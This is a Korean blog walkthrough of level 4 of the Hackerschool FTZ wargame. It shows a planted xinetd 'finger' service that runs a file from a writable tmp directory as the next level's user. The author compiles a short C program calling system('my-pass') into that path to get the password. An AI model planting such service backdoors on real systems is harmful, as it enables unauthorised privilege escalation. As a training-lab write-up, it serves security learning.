[level4@ftz level4]$ ls
hint public_html tmp
[level4@ftz level4]$ cat hint
누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!
/etc/xinetd.d로 이동을 하겠슴돠
[level4@ftz xinetd.d]$ ls -l
합계 84
-rw-r----- 1 root level4 171 12월 8 2003 backdoor
-rw-r--r-- 1 root root 563 2월 25 2003 chargen
-rw-r--r-- 1 root root 580 2월 25 2003 chargen-udp
-rwxr-xr-x 1 root root 239 2월 13 2003 cups-lpd
-rw-r--r-- 1 root root 453 12월 19 2008 daytime
(생략)...
[level4@ftz xinetd.d]$ cat backdoor
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
finger명령어를 입력하면 level5의 권한으로 /home/level4/tmp/backdoor을 실행시키는 겁니다.
$vi backdoor.c
#include<stdio.h>
main()
{
system("my-pass");
}
위의 코드를 작석하셔서 backdoor로 컴파일 시켜줍니다.
빠밤!!! get Password :)
=================
알게된 것
#backdoor :: 시스템침투에 성공한 크래커가 쉽게 침투하기 위해 만든 뒷문
#/etc/xinetd.d ::슈퍼데몬(자세한 사항 : http://light99.egloos.com/5142379)
'Security > [게임] F.T.Z(해커스쿨)' 카테고리의 다른 글
| [F.T.Z] level3 (0) | 2013.01.07 |
|---|---|
| [F.T.Z] level2 (0) | 2013.01.07 |
| [F.T.Z] level 1 (0) | 2013.01.07 |
